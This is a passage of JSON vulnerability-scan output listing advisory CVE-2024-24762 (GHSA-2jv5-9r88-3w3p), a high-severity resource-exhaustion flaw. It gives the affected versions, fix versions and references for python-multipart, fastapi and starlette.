L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n\u003c/details\u003e",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "python-multipart",
                    "purl": "pkg:pypi/python-multipart"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "0.0.7"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.0.1",
                    "0.0.2",
                    "0.0.3",
                    "0.0.4",
                    "0.0.5",
                    "0.0.6"
                  ],
                  "database_specific": {
                    "last_known_affected_version_range": "\u003c= 0.0.6",
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json"
                  }
                },
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "fastapi",
                    "purl": "pkg:pypi/fastapi"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "0.109.1"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1.0",
                    "0.1.10",
                    "0.1.11",
                    "0.1.12",
                    "0.1.13",
                    "0.1.14",
                    "0.1.15",
                    "0.1.16",
                    "0.1.17",
                    "0.1.18",
                    "0.1.19",
                    "0.1.2",
                    "0.1.3",
                    "0.1.4",
                    "0.1.5",
                    "0.1.6",
                    "0.1.7",
                    "0.1.8",
                    "0.1.9",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.100.0",
                    "0.100.0b1",
                    "0.100.0b2",
                    "0.100.0b3",
                    "0.100.1",
                    "0.101.0",
                    "0.101.1",
                    "0.102.0",
                    "0.103.0",
                    "0.103.1",
                    "0.103.2",
                    "0.104.0",
                    "0.104.1",
                    "0.105.0",
                    "0.106.0",
                    "0.107.0",
                    "0.108.0",
                    "0.109.0",
                    "0.11.0",
                    "0.12.0",
                    "0.12.1",
                    "0.13.0",
                    "0.14.0",
                    "0.15.0",
                    "0.16.0",
                    "0.17.0",
                    "0.18.0",
                    "0.19.0",
                    "0.2.0",
                    "0.2.1",
                    "0.20.0",
                    "0.20.1",
                    "0.21.0",
                    "0.22.0",
                    "0.23.0",
                    "0.24.0",
                    "0.25.0",
                    "0.26.0",
                    "0.27.0",
                    "0.27.1",
                    "0.27.2",
                    "0.28.0",
                    "0.29.0",
                    "0.29.1",
                    "0.3.0",
                    "0.30.0",
                    "0.30.1",
                    "0.31.0",
                    "0.32.0",
                    "0.33.0",
                    "0.34.0",
                    "0.35.0",
                    "0.36.0",
                    "0.37.0",
                    "0.38.0",
                    "0.38.1",
                    "0.39.0",
                    "0.4.0",
                    "0.40.0",
                    "0.41.0",
                    "0.42.0",
                    "0.43.0",
                    "0.44.0",
                    "0.44.1",
                    "0.45.0",
                    "0.46.0",
                    "0.47.0",
                    "0.47.1",
                    "0.48.0",
                    "0.49.0",
                    "0.49.1",
                    "0.49.2",
                    "0.5.0",
                    "0.5.1",
                    "0.50.0",
                    "0.51.0",
                    "0.52.0",
                    "0.53.0",
                    "0.53.1",
                    "0.53.2",
                    "0.54.0",
                    "0.54.1",
                    "0.54.2",
                    "0.55.0",
                    "0.55.1",
                    "0.56.0",
                    "0.56.1",
                    "0.57.0",
                    "0.58.0",
                    "0.58.1",
                    "0.59.0",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.6.4",
                    "0.60.0",
                    "0.60.1",
                    "0.60.2",
                    "0.61.0",
                    "0.61.1",
                    "0.61.2",
                    "0.62.0",
                    "0.63.0",
                    "0.64.0",
                    "0.65.0",
                    "0.65.1",
                    "0.65.2",
                    "0.65.3",
                    "0.66.0",
                    "0.66.1",
                    "0.67.0",
                    "0.68.0",
                    "0.68.1",
                    "0.68.2",
                    "0.69.0",
                    "0.7.0",
                    "0.7.1",
                    "0.70.0",
                    "0.70.1",
                    "0.71.0",
                    "0.72.0",
                    "0.73.0",
                    "0.74.0",
                    "0.74.1",
                    "0.75.0",
                    "0.75.1",
                    "0.75.2",
                    "0.76.0",
                    "0.77.0",
                    "0.77.1",
                    "0.78.0",
                    "0.79.0",
                    "0.79.1",
                    "0.8.0",
                    "0.80.0",
                    "0.81.0",
                    "0.82.0",
                    "0.83.0",
                    "0.84.0",
                    "0.85.0",
                    "0.85.1",
                    "0.85.2",
                    "0.86.0",
                    "0.87.0",
                    "0.88.0",
                    "0.89.0",
                    "0.89.1",
                    "0.9.0",
                    "0.9.1",
                    "0.90.0",
                    "0.90.1",
                    "0.91.0",
                    "0.92.0",
                    "0.93.0",
                    "0.94.0",
                    "0.94.1",
                    "0.95.0",
                    "0.95.1",
                    "0.95.2",
                    "0.96.0",
                    "0.96.1",
                    "0.97.0",
                    "0.98.0",
                    "0.99.0",
                    "0.99.1"
                  ],
                  "database_specific": {
                    "last_known_affected_version_range": "\u003c= 0.109.0",
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json"
                  }
                },
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "starlette",
                    "purl": "pkg:pypi/starlette"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "0.36.2"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1.0",
                    "0.1.1",
                    "0.1.10",
                    "0.1.11",
                    "0.1.12",
                    "0.1.13",
                    "0.1.14",
                    "0.1.15",
                    "0.1.16",
                    "0.1.17",
                    "0.1.2",
                    "0.1.3",
                    "0.1.4",
                    "0.1.5",
                    "0.1.6",
                    "0.1.7",
                    "0.1.8",
                    "0.1.9",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.10.3",
                    "0.10.4",
                    "0.10.5",
                    "0.10.6",
                    "0.10.7",
                    "0.11.0",
                    "0.11.1",
                    "0.11.2",
                    "0.11.3",
                    "0.11.4",
                    "0.12.0",
                    "0.12.0b1",
                    "0.12.0b2",
                    "0.12.0b3",
                    "0.12.1",
                    "0.12.10",
                    "0.12.11",
                    "0.12.12",
                    "0.12.13",
                    "0.12.2",
                    "0.12.3",
                    "0.12.4",
                    "0.12.5",
                    "0.12.6",
                    "0.12.7",
                    "0.12.8",
                    "0.12.9",
                    "0.13.0",
                    "0.13.1",
                    "0.13.2",
                    "0.13.3",
                    "0.13.4",
                    "0.13.5",
                    "0.13.6",
                    "0.13.7",
                    "0.13.8",
                    "0.14.0",
                    "0.14.1",
                    "0.14.2",
                    "0.15.0",
                    "0.16.0",
                    "0.17.0",
                    "0.17.1",
                    "0.18.0",
                    "0.19.0",
                    "0.19.1",
                    "0.2.0",
                    "0.2.1",
                    "0.2.2",
                    "0.2.3",
                    "0.20.0",
                    "0.20.1",
                    "0.20.2",
                    "0.20.3",
                    "0.20.4",
                    "0.21.0",
                    "0.22.0",
                    "0.23.0",
                    "0.23.1",
                    "0.24.0",
                    "0.25.0",
                    "0.26.0",
                    "0.26.0.post1",
                    "0.26.1",
                    "0.27.0",
                    "0.28.0",
                    "0.29.0",
                    "0.3.0",
                    "0.3.1",
                    "0.3.2",
                    "0.3.3",
                    "0.3.4",
                    "0.3.5",
                    "0.3.6",
                    "0.3.7",
                    "0.30.0",
                    "0.31.0",
                    "0.31.1",
                    "0.32.0",
                    "0.32.0.post1",
                    "0.33.0",
                    "0.34.0",
                    "0.35.0",
                    "0.35.1",
                    "0.36.0",
                    "0.36.1",
                    "0.4.0",
                    "0.4.1",
                    "0.4.2",
                    "0.5.0",
                    "0.5.1",
                    "0.5.2",
                    "0.5.3",
                    "0.5.4",
                    "0.5.5",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.7.0",
                    "0.7.1",
                    "0.7.2",
                    "0.7.3",
                    "0.7.4",
                    "0.8.0",
                    "0.8.1",
                    "0.8.2",
                    "0.8.3",
                    "0.8.4",
                    "0.8.5",
                    "0.8.6",
                    "0.8.7",
                    "0.8.8",
                    "0.9.0",
                    "0.9.1",
                    "0.9.10",
                    "0.9.11",
                    "0.9.2",
                    "0.9.3",
                    "0.9.4",
                    "0.9.5",
                    "0.9.6",
                    "0.9.7",
                    "0.9.8",
                    "0.9.9"
                  ],
                  "database_specific": {
                    "last_known_affected_version_range": "\u003c= 0.36.1",
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/Kludex/python-multipart"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-400"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-02-12T17:28:12Z",
                "nvd_published_at": null,
                "severity": "HIGH"
              }
            }
          ],
          "groups": [
            {
              "ids": [
                "GHSA-2jv5-9r88-3w3p"
              ],
              "aliases": [
                "CVE-2024-24762",
                "GHSA-2jv5-9r88-3w3p",
                "GHSA-93gm-qmq6-w238",
                "GHSA-qf9m-vfgh-m389",
                "PYSEC-2024-38"
              ],
              "max_severity": "7.5"
            }
          ]
        }
      ]
    }
  ],
  "experimental_config": {
    "licenses": {
      "summary": false,
      "allowlist": null
    }
  }
}
